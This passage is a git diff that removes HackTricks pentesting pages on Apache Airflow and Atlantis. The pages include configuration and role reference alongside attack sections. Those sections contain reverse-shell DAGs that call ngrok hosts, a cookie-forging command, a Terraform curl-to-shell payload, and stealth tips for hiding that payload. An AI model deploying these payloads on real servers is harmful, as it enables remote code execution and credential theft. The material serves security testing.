+* [Pentesting Cloud (AWS, GCP, Az...)](https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology)
+* [Pentesting CI/CD (Github, Jenkins, Terraform...)](https://cloud.hacktricks.xyz/pentesting-ci-cd/pentesting-ci-cd-methodology)
## π Hardware/Physical Access
diff --git a/cloud-security/apache-airflow/README.md b/cloud-security/apache-airflow/README.md
deleted file mode 100644
index a8e93193d..000000000
--- a/cloud-security/apache-airflow/README.md
+++ /dev/null
@@ -1,175 +0,0 @@
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
-# Basic Information
-
-[**Apache Airflow**](https://airflow.apache.org) is used for the **scheduling and **_**orchestration of data pipelines**_** or workflows**. Orchestration of data pipelines refers to the sequencing, coordination, scheduling, and managing complex **data pipelines from diverse sources**. These data pipelines deliver data sets that are ready for consumption either by business intelligence applications and data science, machine learning models that support big data applications.
-
-Basically, Apache Airflow will allow you to **schedule de execution of code when something** (event, cron) **happens**.
-
-# Local Lab
-
-## Docker-Compose
-
-You can use the **docker-compose config file from** [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) to launch a complete apache airflow docker environment. (If you are in MacOS make sure to give at least 6GB of RAM to the docker VM).
-
-## Minikube
-
-One easy way to **run apache airflo**w is to run it **with minikube**:
-
-```bash
-helm repo add airflow-stable https://airflow-helm.github.io/charts
-helm repo update
-helm install airflow-release airflow-stable/airflow
-# Some information about how to aceess the web console will appear after this command
-
-# Use this command to delete it
-helm delete airflow-release
-```
-
-# Airflow Configuration
-
-Airflow might store **sensitive information** in its configuration or you can find weak configurations in place:
-
-{% content-ref url="airflow-configuration.md" %}
-[airflow-configuration.md](airflow-configuration.md)
-{% endcontent-ref %}
-
-# Airflow RBAC
-
-Before start attacking Airflow you should understand **how permissions work**:
-
-{% content-ref url="airflow-rbac.md" %}
-[airflow-rbac.md](airflow-rbac.md)
-{% endcontent-ref %}
-
-# Attacks
-
-## Web Console Enumeration
-
-If you have **access to the web console** you might be able to access some or all of the following information:
-
-* **Variables** (Custom sensitive information might be stored here)
-* **Connections** (Custom sensitive information might be stored here)
-* [**Configuration**](./#airflow-configuration) (Sensitive information like the **`secret_key`** and passwords might be stored here)
-* List **users & roles**
-* **Code of each DAG** (which might contain interesting info)
-
-## Privilege Escalation
-
-If the **`expose_config`** configuration is set to **True**, from the **role User** and **upwards** can **read** the **config in the web**. In this config, the **`secret_key`** appears, which means any user with this valid they can **create its own signed cookie to impersonate any other user account**.
-
-```bash
-flask-unsign --sign --secret '' --cookie "{'_fresh': True, '_id': '12345581593cf26619776d0a1e430c412171f4d12a58d30bef3b2dd379fc8b3715f2bd526eb00497fcad5e270370d269289b65720f5b30a39e5598dad6412345', '_permanent': True, 'csrf_token': '09dd9e7212e6874b104aad957bbf8072616b8fbc', 'dag_status_filter': 'all', 'locale': 'en', 'user_id': '1'}"
-```
-
-## DAG Backdoor (RCE in Airflow worker)
-
-If you have **write access** to the place where the **DAGs are saved**, you can just **create one** that will send you a **reverse shell.**\
-Note that this reverse shell is going to be executed inside an **airflow worker container**:
-
-```python
-import pendulum
-from airflow import DAG
-from airflow.operators.bash import BashOperator
-
-with DAG(
- dag_id='rev_shell_bash',
- schedule_interval='0 0 * * *',
- start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
-) as dag:
- run = BashOperator(
- task_id='run',
- bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433 0>&1',
- )
-```
-
-```python
-import pendulum, socket, os, pty
-from airflow import DAG
-from airflow.operators.python import PythonOperator
-
-def rs(rhost, port):
- s = socket.socket()
- s.connect((rhost, port))
- [os.dup2(s.fileno(),fd) for fd in (0,1,2)]
- pty.spawn("/bin/sh")
-
-with DAG(
- dag_id='rev_shell_python',
- schedule_interval='0 0 * * *',
- start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
-) as dag:
- run = PythonOperator(
- task_id='rs_python',
- python_callable=rs,
- op_kwargs={"rhost":"8.tcp.ngrok.io", "port": 11433}
- )
-```
-
-## DAG Backdoor (RCE in Airflow scheduler)
-
-If you set something to be **executed in the root of the code**, at the moment of this writing, it will be **executed by the scheduler** after a couple of seconds after placing it inside the DAG's folder.
-
-```python
-import pendulum, socket, os, pty
-from airflow import DAG
-from airflow.operators.python import PythonOperator
-
-def rs(rhost, port):
- s = socket.socket()
- s.connect((rhost, port))
- [os.dup2(s.fileno(),fd) for fd in (0,1,2)]
- pty.spawn("/bin/sh")
-
-rs("2.tcp.ngrok.io", 14403)
-
-with DAG(
- dag_id='rev_shell_python2',
- schedule_interval='0 0 * * *',
- start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
-) as dag:
- run = PythonOperator(
- task_id='rs_python2',
- python_callable=rs,
- op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144}
-```
-
-## DAG Creation
-
-If you manage to **compromise a machine inside the DAG cluster**, you can create new **DAGs scripts** in the `dags/` folder and they will be **replicated in the rest of the machines** inside the DAG cluster.
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
diff --git a/cloud-security/apache-airflow/airflow-configuration.md b/cloud-security/apache-airflow/airflow-configuration.md
deleted file mode 100644
index ae4e65f9e..000000000
--- a/cloud-security/apache-airflow/airflow-configuration.md
+++ /dev/null
@@ -1,143 +0,0 @@
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
-# Configuration File
-
-**Apache Airflow** generates a **config file** in all the airflow machines called **`airflow.cfg`** in the home of the airflow user. This config file contains configuration information and **might contain interesting and sensitive information.**
-
-**There are two ways to access this file: By compromising some airflow machine, or accessing the web console.**
-
-Note that the **values inside the config file** **might not be the ones used**, as you can overwrite them setting env variables such as `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'`.
-
-If you have access to the **config file in the web server**, you can check the **real running configuration** in the same page the config is displayed.\
-If you have **access to some machine inside the airflow env**, check the **environment**.
-
-Some interesting values to check when reading the config file:
-
-## \[api]
-
-* **`access_control_allow_headers`**: This indicates the **allowed** **headers** for **CORS**
-* **`access_control_allow_methods`**: This indicates the **allowed methods** for **CORS**
-* **`access_control_allow_origins`**: This indicates the **allowed origins** for **CORS**
-* **`auth_backend`**: [**According to the docs**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) a few options can be in place to configure who can access to the API:
- * `airflow.api.auth.backend.deny_all`: **By default nobody** can access the API
- * `airflow.api.auth.backend.default`: **Everyone can** access it without authentication
- * `airflow.api.auth.backend.kerberos_auth`: To configure **kerberos authentication**
- * `airflow.api.auth.backend.basic_auth`: For **basic authentication**
- * `airflow.composer.api.backend.composer_auth`: Uses composers authentication (GCP) (from [**here**](https://cloud.google.com/composer/docs/access-airflow-api)).
- * `composer_auth_user_registration_role`: This indicates the **role** the **composer user** will get inside **airflow** (**Op** by default).
- * You can also **create you own authentication** method with python.
-* **`google_key_path`:** Path to the **GCP service account key**
-
-## **\[atlas]**
-
-* **`password`**: Atlas password
-* **`username`**: Atlas username
-
-## \[celery]
-
-* **`flower_basic_auth`** : Credentials (_user1:password1,user2:password2_)
-* **`result_backend`**: Postgres url which may contain **credentials**.
-* **`ssl_cacert`**: Path to the cacert
-* **`ssl_cert`**: Path to the cert
-* **`ssl_key`**: Path to the key
-
-## \[core]
-
-* **`dag_discovery_safe_mode`**: Enabled by default. When discovering DAGs, ignore any files that donβt contain the strings `DAG` and `airflow`.
-* **`fernet_key`**: Key to store encrypted variables (symmetric)
-* **`hide_sensitive_var_conn_fields`**: Enabled by default, hide sensitive info of connections.
-* **`security`**: What security module to use (for example kerberos)
-
-## \[dask]
-
-* **`tls_ca`**: Path to ca
-* **`tls_cert`**: Part to the cert
-* **`tls_key`**: Part to the tls key
-
-## \[kerberos]
-
-* **`ccache`**: Path to ccache file
-* **`forwardable`**: Enabled by default
-
-## \[logging]
-
-* **`google_key_path`**: Path to GCP JSON creds.
-
-## \[secrets]
-
-* **`backend`**: Full class name of secrets backend to enable
-* **`backend_kwargs`**: The backend\_kwargs param is loaded into a dictionary and passed to **init** of secrets backend class.
-
-## \[smtp]
-
-* **`smtp_password`**: SMTP password
-* **`smtp_user`**: SMTP user
-
-## \[webserver]
-
-* **`cookie_samesite`**: By default it's **Lax**, so it's already the weakest possible value
-* **`cookie_secure`**: Set **secure flag** on the the session cookie
-* **`expose_config`**: By default is False, if true, the **config** can be **read** from the web **console**
-* **`expose_stacktrace`**: By default it's True, it will show **python tracebacks** (potentially useful for an attacker)
-* **`secret_key`**: This is the **key used by flask to sign the cookies** (if you have this you can **impersonate any user in Airflow**)
-* **`web_server_ssl_cert`**: **Path** to the **SSL** **cert**
-* **`web_server_ssl_key`**: **Path** to the **SSL** **Key**
-* **`x_frame_enabled`**: Default is **True**, so by default clickjacking isn't possible
-
-## Web Authentication
-
-By default **web authentication** is specified in the file **`webserver_config.py`** and is configured as
-
-```bash
-AUTH_TYPE = AUTH_DB
-```
-
-Which means that the **authentication is checked against the database**. However, other configurations are possible like
-
-```bash
-AUTH_TYPE = AUTH_OAUTH
-```
-
-To leave the **authentication to third party services**.
-
-However, there is also an option to a**llow anonymous users access**, setting the following parameter to the **desired role**:
-
-```bash
-AUTH_ROLE_PUBLIC = 'Admin'
-```
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
diff --git a/cloud-security/apache-airflow/airflow-rbac.md b/cloud-security/apache-airflow/airflow-rbac.md
deleted file mode 100644
index 575288e30..000000000
--- a/cloud-security/apache-airflow/airflow-rbac.md
+++ /dev/null
@@ -1,75 +0,0 @@
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
-# RBAC
-
-Airflow ships with a **set of roles by default**: **Admin**, **User**, **Op**, **Viewer**, and **Public**. **Only `Admin`** users could **configure/alter the permissions for other roles**. But it is not recommended that `Admin` users alter these default roles in any way by removing or adding permissions to these roles.
-
-* **`Admin`** users have all possible permissions.
-* **`Public`** users (anonymous) donβt have any permissions.
-* **`Viewer`** users have limited viewer permissions (only read). It **cannot see the config.**
-* **`User`** users have `Viewer` permissions plus additional user permissions that allows him to manage DAGs a bit. He **can see the config file**
-* **`Op`** users have `User` permissions plus additional op permissions.
-
-Note that **admin** users can **create more roles** with more **granular permissions**.
-
-Also note that the only default role with **permission to list users and roles is Admin, not even Op** is going to be able to do that.
-
-## Default Permissions
-
-These are the default permissions per default role:
-
-* **Admin**
-
-\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on Roles, can read on Permissions, can delete on Roles, can edit on Roles, can create on Roles, can read on Users, can create on Users, can edit on Users, can delete on Users, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs, can read on Task Reschedules, menu access on Task Reschedules, can read on Triggers, menu access on Triggers, can read on Passwords, can edit on Passwords, menu access on List Users, menu access on Security, menu access on List Roles, can read on User Stats Chart, menu access on User's Statistics, menu access on Base Permissions, can read on View Menus, menu access on Views/Menus, can read on Permission Views, menu access on Permission on Views/Menus, can get on MenuApi, menu access on Providers, can create on XComs]
-
-* **Op**
-
-\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs]
-
-* **User**
-
-\[can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances]
-
-* **Viewer**
-
-\[can read on DAGs, can read on DAG Runs, can read on Task Instances, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances]
-
-* **Public**
-
-\[]
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
diff --git a/cloud-security/atlantis.md b/cloud-security/atlantis.md
deleted file mode 100644
index c92ece0ad..000000000
--- a/cloud-security/atlantis.md
+++ /dev/null
@@ -1,394 +0,0 @@
-# Atlantis
-
-## Atlantis
-
-
-
-Support HackTricks and get benefits!
-
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-## Basic Information
-
-Atlantis basically helps you to to run terraform from Pull Requests from your git server.
-
-![](<../.gitbook/assets/image (307) (3).png>)
-
-## Local Lab
-
-1. Go to the **atlantis releases page** in [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases) and **download** the one that suits you.
-2. Create a **personal token** (with repo access) of your **github** user
-3. Execute `./atlantis testdrive` and it will create a **demo repo** you can use to **talk to atlantis**
- 1. You can access the web page in 127.0.0.1:4141
-
-## Atlantis Access
-
-### Git Server Credentials
-
-**Atlantis** support several git hosts such as **Github**, **Gitlab**, **Bitbucket** and **Azure DevOps**.\
-However, in order to access the repos in those platforms and perform actions, it needs to have some **privileged access granted to them** (at least write permissions).\
-[**The docs**](https://www.runatlantis.io/docs/access-credentials.html#create-an-atlantis-user-optional) encourage to create a user in these platform specifically for Atlantis, but some people might use personal accounts.
-
-{% hint style="warning" %}
-In any case, from an attackers perspective, the **Atlantis account** is going to be one very **interesting** **to compromise**.
-{% endhint %}
-
-### Webhooks
-
-Atlantis uses optionally [**Webhook secrets**](https://www.runatlantis.io/docs/webhook-secrets.html#generating-a-webhook-secret) to validate that the **webhooks** it receives from your Git host are **legitimate**.
-
-One way to confirm this would be to **allowlist requests to only come from the IPs** of your Git host but an easier way is to use a Webhook Secret.
-
-Note that unless you use a private github or bitbucket server, you will need to expose webhook endpoints to the Internet.
-
-{% hint style="warning" %}
-Atlantis is going to be **exposing webhooks** so the git server can send it information. From an attackers perspective it would be interesting to know **if you can send it messages**.
-{% endhint %}
-
-### Provider Credentials
-
-Atlantis runs Terraform by simply **executing `terraform plan` and `apply`** commands on the server **Atlantis is hosted on**. Just like when you run Terraform locally, Atlantis needs credentials for your specific provider.
-
-It's up to you how you [provide credentials](https://www.runatlantis.io/docs/provider-credentials.html#aws-specific-info) for your specific provider to Atlantis:
-
-* The Atlantis [Helm Chart](https://www.runatlantis.io/docs/deployment.html#kubernetes-helm-chart) and [AWS Fargate Module](https://www.runatlantis.io/docs/deployment.html#aws-fargate) have their own mechanisms for provider credentials. Read their docs.
-* If you're running Atlantis in a cloud then many clouds have ways to give cloud API access to applications running on them, ex:
- * [AWS EC2 Roles](https://registry.terraform.io/providers/hashicorp/aws/latest/docs) (Search for "EC2 Role")
- * [GCE Instance Service Accounts](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider\_reference)
-* Many users set environment variables, ex. `AWS_ACCESS_KEY`, where Atlantis is running.
-* Others create the necessary config files, ex. `~/.aws/credentials`, where Atlantis is running.
-* Use the [HashiCorp Vault Provider](https://registry.terraform.io/providers/hashicorp/vault/latest/docs) to obtain provider credentials.
-
-{% hint style="warning" %}
-The **container** where **Atlantis** is **running** will highly probably **contain privileged credentials** to the providers (AWS, GCP, Github...) that Atlantis is managing via Terraform.
-{% endhint %}
-
-### Web Page
-
-By default Atlantis will run a **web page in the port 4141 in localhost**. This page just allows you to enable/disable atlantis apply and check the plan status of the repos and unlock them (it doesn't allow to modify things, so it isn't that useful).
-
-You probably won't find it exposed to the internet, but it looks like by default **no credentials are needed** to access it (and if they are `atlantis`:`atlantis` are the **default** ones).
-
-## Server Configuration
-
-Configuration to `atlantis server` can be specified via command line flags, environment variables, a config file or a mix of the three.
-
-* You can find [**here the list of flags**](https://www.runatlantis.io/docs/server-configuration.html#server-configuration) supported by Atlantis server
-* You can find [**here how to transform a config option into an env var**](https://www.runatlantis.io/docs/server-configuration.html#environment-variables)\*\*\*\*
-
-Values are **chosen in this order**:
-
-1. Flags
-2. Environment Variables
-3. Config File
-
-{% hint style="warning" %}
-Note that in the configuration you might find interesting values such as **tokens and passwords**.
-{% endhint %}
-
-### Repos Configuration
-
-Some configurations affects **how the repos are managed**. However, it's possible that **each repo require different settings**, so there are ways to specify each repo. This is the priority order:
-
-1. Repo [**`/atlantis.yml`**](https://www.runatlantis.io/docs/repo-level-atlantis-yaml.html#repo-level-atlantis-yaml-config) file. This file can be used to specify how atlantis should treat the repo. However, by default some keys cannot be specified here without some flags allowing it.
- 1. Probably required to be allowed by flags like `allowed_overrides` or `allow_custom_workflows`
-2. \*\*\*\*[**Server Side Config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config): You can pass it with the flag `--repo-config` and it's a yaml configuring new settings for each repo (regexes supported)
-3. **Default** values
-
-**PR Protections**
-
-Atlantis allows to indicate if you want the **PR** to be **`approved`** by somebody else (even if that isn't set in the branch protection) and/or be \*\*`mergeable` \*\* (branch protections passed) **before running apply**. From a security point of view, to set both options a recommended.
-
-In case `allowed_overrides` is True, these setting can be **overwritten on each project by the `/atlantis.yml` file**.
-
-**Scripts**
-
-The repo config can **specify scripts** to run [**before**](https://www.runatlantis.io/docs/pre-workflow-hooks.html#usage) \*\*\*\* (_pre workflow hooks_) and [**after**](https://www.runatlantis.io/docs/post-workflow-hooks.html) \*\*\*\* (_post workflow hooks_) a **workflow is executed.**
-
-There isn't any option to allow **specifying** these scripts in the \*\*repo `/atlantis.yml` \*\* file.
-
-**Workflow**
-
-In the repo config (server side config) you can [**specify a new default workflow**](https://www.runatlantis.io/docs/server-side-repo-config.html#change-the-default-atlantis-workflow), or [**create new custom workflows**](https://www.runatlantis.io/docs/custom-workflows.html#custom-workflows)**.** You can also **specify** which **repos** can **access** the **new** ones generated.\
-\*\*\*\*Then, you can allow the **atlantis.yaml** file of each repo to **specify the workflow to use.**
-
-{% hint style="danger" %}
-If the flag \*\*\*\* `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo.\
-This will basically give **RCE in the Atlantis server to any user that can access that repo**.
-
-```yaml
-# atlantis.yaml
-version: 3
-projects:
-- dir: .
- workflow: custom1
-workflows:
- custom1:
- plan:
- steps:
- - init
- - run: my custom plan command
- apply:
- steps:
- - run: my custom apply command
-```
-{% endhint %}
-
-**Conftest Policy Checking**
-
-Atlantis supports running **server-side** [**conftest**](https://www.conftest.dev) **policies** against the plan output. Common usecases for using this step include:
-
-* Denying usage of a list of modules
-* Asserting attributes of a resource at creation time
-* Catching unintentional resource deletions
-* Preventing security risks (ie. exposing secure ports to the public)
-
-You can check how to configure it in [**the docs**](https://www.runatlantis.io/docs/policy-checking.html#how-it-works).
-
-## Atlantis Commands
-
-\*\*\*\*[**In the docs**](https://www.runatlantis.io/docs/using-atlantis.html#using-atlantis) you can find the options you can use to run Atlantis:
-
-```bash
-# Get help
-atlantis help
-
-# Run terraform plan
-atlantis plan [options] -- [terraform plan flags]
-#Options:
-# -d directory
-# -p project
-# --verbose
-# You can also add extra terraform options
-
-# Run terraform apply
-atlantis apply [options] -- [terraform apply flags]
-#Options:
-# -d directory
-# -p project
-# -w workspace
-# --auto-merge-disabled
-# --verbose
-# You can also add extra terraform options
-```
-
-## Attacks
-
-{% hint style="warning" %}
-If during the exploitation you find this **error**: `Error: Error acquiring the state lock`
-
-You can fix it by running:
-
-```
-atlantis unlock #You might need to run this in a different PR
-atlantis plan -- -lock=false
-```
-{% endhint %}
-
-### Atlantis plan RCE - Config modification in new PR
-
-If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can \*\*execute `atlantis plan` \*\* (or maybe it's automatically executed) **you will be able to RCE inside the Atlantis server**.
-
-You can do this by making [**Atlantis load an external data source**](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data\_source). Just put a payload like the following in the `main.tf` file:
-
-```json
-data "external" "example" {
- program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
-}
-```
-
-**Stealthier Attack**
-
-You can perform this attack even in a **stealthier way**, by following this suggestions:
-
-* Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell:
-
-```javascript
-module "not_rev_shell" {
- source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
-}
-```
-
-You can find the rev shell code in [https://github.com/carlospolop/terraform\_external\_module\_rev\_shell/tree/main/modules](https://github.com/carlospolop/terraform\_external\_module\_rev\_shell/tree/main/modules)
-
-* In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
-* **Instead** of creating a **PR to master** to trigger Atlantis, **create 2 branches** (test1 and test2) and create a **PR from one to the other**. When you have completed the attack, just **remove the PR and the branches**.
-
-### Atlantis apply RCE - Config modification in new PR
-
-If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis apply` you will be able to RCE inside the Atlantis server**.
-
-However, you will usually need to bypass some protections:
-
-* **Mergeable**: If this protection is set in Atlantis, you can only run **`atlantis apply` if the PR is mergeable** (which means that the branch protection need to be bypassed).
